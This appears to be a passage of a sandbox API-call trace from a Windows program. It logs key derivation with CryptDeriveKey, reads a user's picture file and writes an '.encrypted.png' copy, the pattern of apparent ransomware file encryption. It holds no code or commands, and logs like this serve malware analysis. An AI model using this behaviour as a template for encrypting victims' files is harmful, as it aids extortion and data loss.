cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.780] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.780] CryptHashData (hHash=0x7c2240, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.780] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.780] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.780] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.780] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.780] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.780] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.781] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.781] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.781] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.781] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\80l2tdxo4fcaf.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.781] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.781] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c9758 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9758 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.784] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw")) returned 0x10 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\80l2tdxo4fcaf.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.786] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.786] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4e3f, lpOverlapped=0x0) returned 1 [0039.787] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e3f) returned 0xac0018 [0039.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e3f) returned 0xac4e60 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.788] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e3f) returned 0xac0018 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.788] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.789] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.789] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e3f) returned 0xac0018 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0039.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e3f) returned 0xac9ca8 